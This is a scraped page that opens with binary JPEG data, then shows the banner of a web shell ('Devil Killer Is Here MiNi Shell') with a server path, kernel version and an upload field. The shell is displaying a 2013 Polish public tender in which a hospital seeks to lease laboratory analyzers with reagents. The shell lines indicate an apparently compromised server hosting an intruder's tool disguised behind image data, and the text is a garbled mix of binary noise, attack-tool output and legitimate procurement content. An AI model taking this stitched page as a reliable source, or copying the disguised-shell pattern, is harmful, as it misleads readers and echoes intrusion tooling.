JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130228/31703-N-2013.html

<p class="kh_header"><b>Opole Lubelskie: Dzierżawa analizatorów wraz z dostawą odczynników</b><br>
<b>Numer ogłoszenia: 31703 - 2013; data zamieszczenia: 28.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa analizatorów wraz z dostawą odczynników.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 1    Przedmiot zamówienia

 ZADANIE NR 1

I
Analizatory testów immunochemicznych  kod CPV 38434580-5 -dzierżawa automatycznych wieloparametrowych analizatorów immunodiagnostycznych szt.1 na okres 24 miesięcy wraz z dostawą odczynników na określoną w SIWZ ilość badań oraz koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania nw ilości badań
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 1 LAB
Lp
Nazwa badania
Ilość






1
TROPONINA
2184






2
D-Dimer
700






3
hs CRP
3200






4
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań

























II
Analizatory hematologiczne - kod CPV 38434570-2 -  dzierżawa aparatu hematologicznego szt. 1 wraz z odczynnikami i akcesoriami potrzebnymi do pracy aparatu - dzierżawa na okres 24 miesięcy wraz z odczynnikami, krwią kontrolną 3 poziomy do codziennej kontroli jakości badań
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 2 LAB
Lp
Nazwa badania
Ilość






1
Koszt jednego badania wraz z akcesoriami, odczynnikami i materiałami kontrolnymi
24000






2
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań


































III.
Analizatory biochemiczne - kod  CPV 38434500-1 -  dzierżawa aparatu biochemicznego szt. 1 wraz z odczynnikami, kalibratorami, materiałami kontrolnymi i akcesoriami potrzebnymi do wykonania podanej ilości badań i  codziennej kontroli jakości badań których koszt jest wliczony w cenę badania - dzierżawa na okres 24 miesięcy.

Aparat spełniający wymogi wg. ZAŁĄCZNIKA 3 LAB











nazwa
j.m.
ilość





1
białko całkowite
badanie
900





2
bilirubina całkowita
badanie
2400





3
cholesterol całkowity
badanie
12000





4
cholesterol HDL
badanie
7200





5
glukoza
badanie
24000





6
kreatynina met. kinetyczna bez odbiałczania
badanie
14400





7
kwas moczowy
badanie
1200





8
mocznik
badanie
13800





9
trójglicerydy
badanie
12000





10
aminotransferaza alaninowa
badanie
6000





11
aminotransferaza asparaginowa
badanie
6000





12
amylaza
badanie
2000





13
fosfataza alkaliczna
badanie
1000





14
CKMB
badanie
400





15
wapń całkowity
badanie
720





16
żelazo
badanie
1680





1
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
miesiące
24






Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań


































IV
Analizator do elektrolitów  -  dzierżawa aparatu do elektrolitów szt. 1 wraz z odczynnikami, materiałami kontrolnymi i akcesoriami potrzebnymi do wykonania nw ilości testów  - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 4 LAB
Lp
Nazwa badania - elektrolity Na, K, Cl
Ilość testów






1
Elektrolity ( Na, K, Cl )
16800






2
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań

























V
Analizator do moczu  -  dzierżawa analizatorów szt. 1 wraz z materiałami do wykonania nw ilości badań i codziennej kontroli jakości badań paski, paski kontrolne - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 5 LAB.









Lp
Nazwa badania
Ilość testów






1
Koszt jednego oznaczenia (analiza moczu
18000






2
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24
























VI
Koagulometr półautomatyczny  -  dzierżawa koagulometrów szt. 1 wraz z odczynnikami, kalibratorami, kontrolami i materiałami potrzebnymi do wykonania nw ilości testów i codziennej kontroli jakości badań - dzierżawa na okres 24 miesięcy
Aparat spełniający wymogi wg. ZAŁĄCZNIKA 6 LAB.









Lp
Nazwa badania
Ilość testów






1
PT
13000






2
APTT
3600






3
koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24




























ZADANIE NR 2 

I
 Paskowy, przenośny analizator parametrów krytycznych szt.1 (pomiar: Troponiny, CK-MB, Myoglobiny, D-dimer i NT-proBNP) 
na okres 24 miesięcy wraz z dostawą odczynników na określoną w SIWZ ilość badań oraz koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania n/w ilości badań

Lp
Nazwa badania
Ilość






1
TROPONINA
936






2
D-Dimer
300






3
CK-MB
500






4
Myoglobina
500






5
NT-proBNP
500






4
Koszt dzierżawy sprzętu  miesięcznie - dzierżawa na okres 24 miesięcy
24







Należy podać zestawienie: ilość odczynników, wycena wraz z ilością koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych do wykonania wymaganej ilości badań


















ZAŁĄCZNIK 1 LAB 
I. Analizator testów immunochemicznych  kod CPV 38434580-5 -dzierżawa automatycznyego wieloparametrowego analizatora  immunodiagnostycznego szt.1,
oraz paskowego, przenośnego analizatora parametrów krytycznych szt.1 (pomiar: Troponiny, CK-MB, Myoglobiny, D-dimer i NT-proBNP) wraz z dostawą odczynników na określoną w SIWZ ilość badań oraz koniecznych materiałów eksploatacyjnych, kalibratorów i materiałów kontrolnych

Lp.
Parametry graniczne dla analizatora i odczynników
Wartość oczekiwana Zamawiającego
1
Testy wykonywane metodą chemiluminescencji.
Tak
2
Pełna automatyzacja analiz.
Tak
3
Aparat zawsze gotowy do pracy.
Tak
4
Wydajność aparatu - minimum 90 oznaczeń na godzinę.
Tak
5
Swobodny dostęp do badanych próbek.
Tak
6
Ilość analiz wykonywanych z jednej próbki minimum 24 (podać ile).
Tak
7
Obecność funkcji STAT - możliwość wykonywania próbek pilnych bez konieczności przerywania pracy aparatu.
Tak
8
Praca z różnymi rodzajami probówek.
Tak
9
Chłodzenie odczynników na pokładzie do temperatury lodówki.
Tak
10
Odczynniki gotowe do użycia.
Tak
11
Czytnik kodów paskowych.
Tak
12
Program kontroli jakości - możliwość archiwizacji wyników kontroli, przedstawienie wyników w formie graficznej, statystyka.
Tak
13
Ilość próbek wstawianych jednocześnie - minimum 90.
Tak
14
Detekcja skrzepów.
Tak
15
Automatyczne rozcieńczanie próbek przekraczających zdefiniowany zakres.
Tak
16
Automatyczne zlecenie reflex testów bez udziału operatora.
Tak
17
Możliwość podłączenia analizatora do komputera zewnętrznego lub UPS-a bez dodatkowego oprogramowania.
Tak
18
Archiwizacja danych.
Tak
19
Instrukcja w języku polskim.
Tak
20
Zabezpieczenie systemów komputerowych - UPS.
Tak
21
Analizator wolnostojący o możliwości podłączenia do systemu automatyzacji z immunochemią lub biochemią.
Tak
22
Monitorowanie zużycia odczynników i materiałów zużywalnych.
Tak
23
Oprogramowanie w języku polskim.
Tak
24
Aparat nie starszy niż z 2010 r.
Tak


ZAŁĄCZNIK 2 LAB 
II. Analizator hematologiczny - kod CPV 38434570-2 -  dzierżawa aparatu hematologicznego szt. 1 wraz z odczynnikami i akcesoriami potrzebnymi do pracy aparatu.
Zapewniona krew kontrolna 3 poziomy do codziennej kontroli jakości badań.

Parametry wymagane
Wartość oczekiwana
Zamawiającego



Nie  mniej niż 18 parametrów krwi obwodowej.
TAK



Wydajność nie mniejsza niż 55 oznaczeń na godzinę.
TAK



Zakres liniowości dla parametrów: WBC, RBC, HGB, HCT, PLT zaczynający się od 0.
TAK



Opcja oznaczania PLT w koncentratach wysokopłytkowych z liniowościa od 0 - 4000
TAK



Objętość aspirowanej próbki nie większa niż 11?l (bez wstępnego rozcieńczania).
TAK



Automatyzacja codziennych funkcji obsługowych: start up, automatyczne czyszczenie, kontrola poziomu odczynników.
TAK



Rozdział populacji WBC na: limfocyty, granulocyty i monocyty wyrażony w wartościach bezwzględnych i procentowych.
TAK



Ciekłokrystaliczny ekran dotykowy
TAK



Możliwość tworzenia różnych poziomów dostępów dla Operatora, z możliwością zakładania indywidualnych haseł dostępu (w oprogramowaniu wewnętrznym analizatora)
TAK



Oprogramowanie w jęz. polskim
TAK



Dostępna pamięć wyników pacjentów nie mniejsza niż 15 000.
TAK



Więcej niż jeden protokół transmisji danych do systemu LIS
TAK



Na wyposażeniu zewnętrzny czytnik kodów kreskowych.
TAK



Natężenie hałasu <60 dB (brak kompresora)
TAK



Informacja o stanie analizatora w czasie rzeczywistym
TAK



Możliwość transferu danych poprzez port USB
TAK



Możliwość wpisania pełnych danych pacjenta (imię, nazwisko, płeć, data urodzenia) do pamięci analizatora. 
TAK



Zakresy norm w zależności od płci i wieku
TAK



Zastosowane w analizatorze odczynniki, kontrole i kalibrator muszą bezwzględnie pochodzić od jednego producenta.
TAK



Możliwość posługiwania się wirtualna klawiaturą
TAK



Aparat nie starszy niż z 2010r.
TAK


Wymagania dotyczące odczynników oraz dodatkowe
1
Zamawiający wymaga aby analizator oraz oferowane odczynniki posiadały znak zgodności CE
Tak

2
Zamawiający wymaga aby oferowane odczynniki były odczynnikami bezcjankowymi
Tak

3
Zamawiający wymaga aby do oferty zostały dołączone ulotki odczynnikowe określające skład chemiczny reagentów
Tak

4
Zamawiający wymaga aby Wykonawca dołączył do oferty szczegółowy wykaz odczynników, materiałów kontrolnych i eksploatacyjnych wraz z podaniem ich terminu ważności.
Tak

5
Dla krwi kontrolnej wymagane jest załączenie do oferty kart charakterystyki preparatu dla odczynników posiadających w składzie substancje sklasyfikowane jako niebezpieczne zgodnie z rozporządzeniem MZ z dnia 28 września 2005 r. oraz kartę charakterystyki preparatu dla krwi kontrolnej. Dla odczynników nie posiadających w składzie substancji sklasyfikowanych jako niebezpieczne należy załączyć certyfikat producenta odczynników potwierdzający, że oferowane odczynniki są bezpieczne zgodnie z Dyrektywą o Preparatach Odczynnikowych nr 1999 45 EC 
Tak

6
Zamawiający wymaga aby termin ważności odczynników wynosił minimum 12 miesięcy od daty dostawy - nie dotyczy krwi kontrolnej
Tak

7
Zamawiający wymaga aby w trakcie obowiązywania umowy dostawy Wykonawca gwarantował bezpłatny serwis oraz walidację dzierżawionych urządzeń
Tak



ZAŁĄCZNIK 3 LAB 
III. Analizator biochemiczny - kod  CPV 38434500-1 -  dzierżawa aparatu biochemicznego szt. 1 wraz z odczynnikami, kalibratorami, materiałami kontrolnymi i akcesoriami potrzebnymi do pracy aparatu.


Lp.

Parametry graniczne dla analizatora i odczynników
Wartość oczekiwana Zamawiajacego
1
analizator biochemiczny posiadający deklarację zgodności dla urządzeń medycznych do diagnostyki in vitro.
Tak
2
Automatyczny, wieloparametrowy analizator biochemiczny z przystawką ISE, komputerem i drukarką, wolnostojący 
Tak
3
Wydajność analizatora minimum 200 oznaczeń na godzinę.
Tak
4
Przystawka ISE o wydajności nie mniejszej niż 150 testów na godzinę (sód, potas, chlorki) lub opcja wbudowana.
Tak
5
Możliwość wykonania badań w surowicy, osoczu, płynie mózgowo-rdzeniowym i moczu.
Tak
6
Możliwość równoczesnego wstawienia na pokład i odrębnego wykalibrowania nie mniej niż 2 zestawów (serii) tego samego oznaczenia.
Tak
7
Możliwość ciągłego dodawania próbek badanych, oznaczeń cito, bez przerywania pracy analizatora.
Tak
8
Minimum 40 pozycji na próbki badane.
Tak
9
Analizator z lodówką odczynnikową (2-8 stopni C).
Tak
10
Integralne oprogramowanie analizatora w języku polskim lub szczegółowa instrukcja w języku polskim.
Tak
11
Jednorazowe kuwety pomiarowe.
Tak
12
Dwukierunkowa transmisja danych, możliwość podłączenia do laboratoryjnej sieci komputerowej.
Tak
13
UPS zewnętrzny.
Tak
14
Archiwizacja danych.
Tak
15
Aparat nie starszy niż z 2010 r.
Tak
16
Zużycie wody max 5 l na 1000 oznaczeń
Tak
17
Wykonawca wyposaży aparat w system uzdatniania wody
Tak

ZAŁĄCZNIK 4 LAB 
IV. Analizator do elektrolitów  -  dzierżawa aparatu do elektrolitów szt. 1 wraz z odczynnikami, materiałami kontrolnymi i akcesoriami potrzebnymi do pracy aparatu.

Lp.

Parametry graniczne dla analizatora i odczynników
Wartość oczekiwana Zamawiajacego
1
Możliwość oznaczania jonów Na, K, Cl w pełnej krwi, osoczu, surowicy, moczu.
Tak
2
Całkowicie bezobsługowe elektrody.
Tak
3
Krótki czas pomiaru - do 40 sek. dla krwi.
Tak
4
Mała objętość próbki - do 60 ul dla kapilary i strzykawki.
Tak
5
Podawanie próbki z kapilary bez adapterów.
Tak
6
Program statystycznej kontroli jakości. Wykresy Levay Jenningsa.
Tak
7
Łatwy dostęp do odczynników.
Tak
8
Zamknięte ścieki.
Tak
9
Opcjonalny czytnik kodów kreskowych.
Tak
10
Wbudowana drukarka.
Tak
11
Pamięć kilkudziesięciu wyników pacjentów.
Tak
12
Pamięć kilkudziesięciu wyników QC dla przynajmniej 3 poziomów.
Tak
13
Detektor pęcherzyków powietrza.
Tak
14
Automatyczne lub programowane przejście systemu w stan Standby.
Tak
15
Możliwość zasilania systemu z baterii.
Tak
16
Automatyczne selektywne wyłączanie nieskalibrowanych elektrod.
Tak
17
Flagowanie wyników znajdujących się poza zakresami normalnymi i krytycznymi.
Tak
18
Automatyczne monitorowanie przez aparat poziomu odczynników i informowanie użytkownika.
Tak
19
Możliwość wprowadzania haseł dostępu w celu zabezpieczenia przed zmianą ustawień systemu.
Tak
20
Wykonawca posiada wdrożony system jakości.
Tak
21
Aparat nie starszy niż z 2010 r.
Tak

ZAŁĄCZNIK 5 LAB 
V. Analizator do moczu  -  dzierżawa analizatora  szt. 1 wraz z materiałami do badań /paski/ potrzebnymi do pracy aparatu oraz paskami kontrolnymi.


Lp.

Parametry graniczne dla analizatora i odczynników
Wartość oczekiwana Zamawiającego
1
Wydajność analizatora - min. 60 ozn.  godz.
Tak
2
Pamięć wyników pacjenta min. 200
Tak
3
Ilość określanych parametrów fizykochemicznych - min. 10
Tak
4
Możliwość wykorzystania pasków charakteryzujących się eliminacją wpływu kwasu askorbinowego na wynik pomiaru.
Tak
5
Aparat posiada ekran dotykowy
Tak
6
Współpraca aparatu z czytnikiem kodów kreskowych,komputerem i drukarką

7
Automatyczne rozpoznawanie rodzaju testu paskowego
Tak
8
Możliwość przesyłania danych do komputera 

9
Zapewnienie udziału w bezpłatnej międzynarodowej kontroli jakości badań moczu producenta analizatora przeprowadzanej raz na kwartał.
Tak
10
Aparat wyposażony w czytnik kodów kreskowych

11
Zapewnienie autoryzowanego serwisu wyłącznie przez producenta aparatu.
Tak
12
Aparat nie starszy niż z 2010 r.
Tak

ZAŁĄCZNIK 6 LAB 
VI. Koagulometr półautomatyczny  -  dzierżawa koagulometru szt. 1 wraz z odczynnikami, kalibratorami, kontrolami i materiałami potrzebnymi do pracy aparatów.


Lp.

Parametry dla analizatora 
Wartość oczekiwana Zamawiającego
1
Optyczno-mechaniczna zasada detekcji skrzepu zapewniająca bardzo dobrą powtarzalność wyników i czułość.
Tak
2
Możliwość dowolnej interpretacji wyników np. PT: sek, % normy, PR, INR; Fibrynogen: mg/dl, g/l.
Tak
3
Wbudowana drukarka termoczuła umożliwiająca wydruk na bieżąco otrzymywanych wyników

4
Możliwość wprowadzenia do pamięci aparatu co najmniej 5-ciu krzywych kalibracyjnych.
Tak
5
Możliwość dowolnej konfiguracji analizatora (własne testy i metody).
Tak
6
Aparat nie starszy niż z 2010 r.
Tak

Uwagi ogólne i warunki konieczne do spełnienia przez Dostawcę:
- wykonanie w pomieszczeniach laboratoriów rozbudowy sieci informatycznej  i zasilającej  niezbędnej do pracy aparatów,stacji roboczych,drukarek, innych urządzeń poprzez instalację elementów aktywnych i pasywnych sieci (przewody sieciowe, gniazda sieciowe,przełączniki 1000 Mbit), zgodnie z dokumentacją techniczną stanowiącą załącznik nr 7 do siwz,
- dokonanie podłączenia analizatorów automatycznych do szpitalnej sieci informatycznej oraz zapewnienie kompatybilności z oprogramowaniem MEDICUS ON LINE użytkowanym przez Zamawiającego wraz z całkowitą integracją oferowanego oprogramowania i dostępu do wyników poprzez zapewnienie pełnej wymiany danych z urządzeń lub analizatorów automatycznych do systemu MEDICUS ON LINE na koszt Wykonawcy,
- przeprowadzenie szkolenia obsługi informatycznej (administrator, informatyk) 2 osób z zakresu obsługi administracyjnej wdrażanego systemu, rozwiązań backupowych, technicznych itp.,
- dostarczenie nieodpłatnie oprogramowania laboratoryjnego i  fabrycznie nowego 
   sprzętu komputerowego do pracy z wykorzystaniem dzierżawionych analizatorów,
- oprogramowanie i sprzęt komputerowy dostarczone z analizatorami musi spełniać  warunki  określone w Załączniku nr 7 LAB oraz posiadać:
       - zgodność z wersją 2.3 protokołu HL7,
       - obsługę komunikatów ORM-O01 - interpretacja zlecenia wykonania badań z HIS, w ramach 
         komunikatu obsługa przynajmniej segmentów MSH, ORC, OBR,
       - obsługę komunikatów (transakcji) ORU-R01 - odsyłanie wyników z LIS do HIS, w ramach 
         komunikatu obsługa przynajmniej segmentów MSH, ORC, OBR, OBX,
       - obsługę komunikatów ACK - potwierdzenie transmisji zlecenia (przez LIS) oraz 
         wyników (przez HIS),
- przeprowadzenie szkolenia personelu laboratoriów z obsługi i eksploatacji dostarczonych analizatorów oraz  obsługi oprogramowania /16 osób/oraz wydanie zaświadczenia dla pracowników Działu Diagnostyki Laboratoryjnej po zakończeniu szkolenia z obsługi systemu informatycznego.
- nadzór nad wdrożeniem systemu do eksploatacji,
- aparaty dzierżawione nie mogą być starsze niż z 2010 r., z pełną obsługą serwisową,
- Dostawca wykona bezpłatny przegląd serwisowy każdego z aparatów co najmniej 2 razy w roku,
- dostawa, instalacja analizatorów i wdrożenie systemu w ciągu 5 tygodni od daty podpisania 
   umowy,
- reakcja serwisu w przypadku zgłoszonej usterki analizatora w przeciągu 24 godzin,
- dostawa odczynników i materiałów do 5 dni od chwili złożenia zamówienia,
- w przypadku awarii analizatorów trwającej dłużej niż 24 godziny Dostawca pokryje 
   koszty wykonania badań na zewnątrz,
- Dostawca nie odmówi realizacji zamówienia w przypadku zaległości finansowych,
- Dostawca dostarczy na swój koszt kontrolę zewnętrzną do biochemii i immunochemii 
   /wg. swojej propozycji/ na czas trwania umowy,
- Dostawca dostarczy na swój koszt wirówkę MPW 223 e szt. 1,
- w przypadku awaryjności analizatora w przeciągu pół roku częściej niż 2 w ciągu miesiąca
   Dostawca zobowiązuje się wymienić analizator na inny, wolny od wad.
INNE
1) Analizatory zostaną zainstalowane i przygotowane do eksploatacji w laboratorium Szpitala Powiatowego w Poniatowej ul. Fabryczna 18 przez serwis Dostawcy.
2) Dostawa odczynników  i materiałów eksploatacyjnych staraniem i na koszt Dostawcy.
System informatyczny - parametry wymagane przez Zamawiajacego stanowi załacznik nr 7LAB do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.43.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli
przepisy prawa nakładają obowiązek ich posiadania ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym  do
wykonania zamówienia:</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania  osobami zdolnymi do wykonania zamówienia:</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

